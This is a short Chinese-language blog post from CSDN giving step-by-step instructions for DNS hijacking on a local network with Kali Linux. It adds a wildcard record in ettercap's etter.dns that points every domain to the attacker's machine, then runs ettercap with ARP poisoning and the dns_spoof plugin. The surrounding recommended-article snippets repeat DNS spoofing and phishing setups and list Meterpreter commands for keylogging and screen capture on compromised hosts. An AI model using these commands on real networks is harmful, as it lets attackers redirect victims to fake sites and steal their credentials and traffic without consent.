KALI linux实现DNS劫持

最新推荐文章于 2024-02-24 16:24:30 发布
最新推荐文章于 2024-02-24 16:24:30 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: linux、kali、病毒区
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33391644/article/details/100144233
版权

kali linux主机ip为:192.168.1.3

一、找到ettercap DNS文件。

文件目录:/etc/ettercap/etter.dns

二、用记事本打开它。

三、找到vim:ts=8:noexpandtab,在下方加入*  A   192.168.1.3( * 表示所有链接访问都转发到192.168.1.3)

四、打开终端,运行ettercap输入如下命令:ettercap -T -q -i eth0 -P dns_spoof -M arp

eth0  本机网卡

arp   拦截局域网所有的DNS映射到本机的etter.dns中

劫持开始后局域网内所有访问都会被劫持

 

qq_33391644
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Vim 中的 Tab 键与空格键相关配置项详解
团子大圆帅的博客
07-04 1869
Vim 中的 Tab 键与空格键相关配置项详解 文章目录Vim 中的 Tab 键与空格键相关配置项详解0. 参考资料1. Tab 键与空格键的配置项2. 实例演示 0. 参考资料 Tabs and Spaces 1. Tab 键与空格键的配置项 Vim 针对空格提供了细粒度的配置项,一共有 4 项: tabstop:指定一个 tab 字符的宽度,缩写为 ts。 expandtab:激活...
Linux实现DNS服务
weixin_43774199的博客
01-16 293
1、DNS解析过程
KALI网络安全】DNS攻击(劫持和欺骗)与网络钓鱼的模拟和预防(1)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 4436
1、DNS概述 关于DNS的定义,作用,分类以及工作原理,我已经在【Windows Server 2019】DNS服务器的配置与管理——理论】这篇博客中陈述过。 要预防DNS劫持,必须了解它的攻击原理和过程 声明 本博客不是在向大家展示这些攻击的方法,而是让大家尽可能的了解DNS攻击的手段以及如何采取必要的预防措施,来确保更安全地上网。 2、DSN劫持DNS Hijacking)概述 2.1.什么是DNS劫持 DNS劫持全称为域名服务器劫持,又称DNS重定向(DNS redirection)。它是一种
Kali利用Ettercap实现中间人攻击之DNS劫持DNS欺骗)
m0_46745664的博客
08-11 4548
局域网内进行DNS劫持DNS欺骗)
DNS劫持
rumil的博客
07-25 2272
DNS劫持(Domain Name System hijacking)是黑客经常使用的一种攻击方式,其原理是通过篡改DNS系统的域名解析结果,将某个域名解析到指定的IP地址,从而使得用户访问该域名所对应的网站时,被重定向到攻击者控制的虚假网站,进而实现种种欺骗行为,如钓鱼、木马下载、恶意软件等。DNS劫持的核心原理就在于篡改域名解析结果,攻击者通过某种手段获取到通信链路上的DNS信息,然后将目标域名解析到他所想要的IP地址上,从而将用户引导到自己的虚假网站。
KALI网络安全】DNS攻击(劫持和欺骗)与网络钓鱼的模拟和预防(2)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
09-21 2009
4、DNS欺骗(DNS Spoofing) 案例 2 ——中间人DNS攻击: 4.1.拓扑说明 正常情况下,用户使用浏览器打开天涯论坛登录,然后DNS服务器通过DNS访问到论坛的服务器,返回合法登录网页。 当攻击者进行DNS欺骗时,用户的DNS流量会自动转发给攻击者,攻击者可以通过相应工具回应用户的请求,将恶意网站的IP地址伪装成合法域名的地址返回给用户,用户在不知情的情况下,在恶意网站中输入了账户和密码,数据流量被转发到攻击者电脑中,从而泄漏个人信息。 4.2.实验环境 主机 系统 IP地址
LinuxDNS的总览
因为觉得还太菜所以暂时不更新
11-05 313
DNS总揽 1、什么是DNS DNS是域名系统(或服务)协议,它是一种分布式网络目录服务,主要用于域名与IP地址的相互转换,以及控制因特网的电子邮件的发送。 DNS是因特网的一项核心服务,它作为可以将域名和IP地址互相映射的一个分布式数据库,能使人更方便的访问互联网,是解决网上机器命名的一种系统。 2、DNS名称服务器 (1)根名称服务器 根服务器是将人类可读主机名转换(或解析)为IP地址的第一步...
使用kali linux实现arp欺骗
04-17
小黑子技术和防御方法
Instant Kali Linux
11-22
Get to grips with a new technology, understand what it is... The book is written is simple technical language which requires only a basic knowledge of security assessments and the Linux operating system.
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
kali linux安装教程.pdf
02-29
Kali Linux是一个基于Debian的Linux发行版,它主要用于数字取证和渗透测试。Kali linux预装了许多渗透测试软件,包括nmap、Wireshark、John the Ripper以及Aircrack-ng等。用户可以通过硬盘、live CD或live USB运行...
Kali Linux Network Scanning Cookbook
最新发布
05-16
Kali Linux网络扫描实战指南》是一本专为网络安全专业人士和爱好者编写的书籍,它深入浅出地介绍了如何在Kali Linux操作系统中进行网络扫描。Kali Linux是基于Debian的开源操作系统,专为渗透测试和安全审计设计,...
Kali渗透-DNS域名劫持
兴乐安宁的博客
06-15 745
说明: eth0为Kali本机的网卡名 192.168.195.132 是被攻击机器 192.168.195.2 是局域网的网关地址打开 Kali 攻击机终端窗口,输入命令vim /etc/ettercap/etter.dns来编辑 ettercap 工具的 DNS 配置文件 增加一条新的A纪录,将真实的域名解析指向攻击者主机 IP 地址,也就是Kail主机IP。...
Kali局域网dns劫持复现
weixin_51152373的博客
06-21 633
这是测试时某大厂的防御方法简单粗暴,加了个备用跳转地址使用新的索引,类似于原来是bilibili.com,备用的是m.bilibili.com,所以下一篇将对域名跳转进行研究。3.在配置文件夹中,找到etter.dns文件,移动到下方大约61行的位置,将你想要拉取的网站信息输入进去,这里我拉取的是所有的替换域名输入: * . * .*但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件,那么sslstrip就失效了。
kaliDNS劫持
weixin_33827590的博客
06-28 858
DNS劫持:用户上网的DNS服务器都是运营商分配的,所以,在这个节点上,运营商可以为所欲为例如:访问一个网站,输入域名,正常DNS服务器返回该域名的IP,而DNS劫持后,会返回一个运营商额中间服务器IP,该访问服务器会一致性的返回302,让用户浏览器跳转到预处理好的带广告的网页,在该网页中再通过iframe打开用户原来访问的地址HTTP劫持:在运营商的路由器节点上,设置协议检...
网络攻防之ARP欺骗和DNS劫持实验
m0_62574258的博客
02-24 2350
实验环境:攻击主机:kali2023虚拟机,IP地址为192.168.133.141靶机:Windows10虚拟机,IP地址为192.168.133.129网关地址:192.168.133.2(1)ARP协议介绍在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。这个目标主机的MAC地址就是通过地址解析协议ARP获得的。ARP协议中通常有两种数据包:ARP请求包和ARP应答包。
Kali Linux渗透测试小实践——DNS欺骗
PICACHU+++的博客
12-17 3709
DNS欺骗也称为DNS劫持或重定向,是一种DNS攻击,其中DNS查询被错误地解析,从而意外地将用户重定向到恶意站点。为了进行攻击,犯罪者要么在用户计算机上安装恶意软件,接管路由器,要么拦截或破坏DNS通信。DNS劫持可用于欺骗在这种情况下,攻击者通常显示不需要的广告以产生收入;或用于网络钓鱼,显示用户访问的虚假网站版本并窃取数据或凭据。
使用KALI linux实现DNS劫持实验操作
热门推荐
zhlhely的博客
03-12 1万+
准备工具: 1、KALI LINUX 2、windowns 桥接NAT网卡,自动获取IP 测试windowns上网无问题及查看IP地址 打开KALI命令行,查找并编辑etter.dns文件 在打开的命令行中输入I ,编辑完成后按ESC,:wq保存 编辑完成后保存 KALI打开ettercap-g工具 选择网口 扫描存活...
kali 肉鸡的操作
qq_33391644的博客
02-08 6289
1.屏幕截图命令:screenshot 2.键盘记录命令:keyscan_start   //开启 keyscan_dump //显示键盘记录keyscan_stop //关闭键盘记录3.结束进程命令:Kill 进程4.查看进程命令:ps5.重启电脑命令:Reboot6.关闭电脑命令:Shutdown7.获取电脑信息命令:sysinfo8.音频录音命令:record_mic -d 秒数9.打开窗体...
kali linux 实现sql注入
09-27
Kali Linux是一种专门用于渗透测试和安全审计的Linux发行版,它提供了强大的工具和功能来实现SQL注入攻击。要在Kali Linux实现SQL注入,可以按照以下步骤进行操作: 1. 安装git:在终端中运行命令`apt-get ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值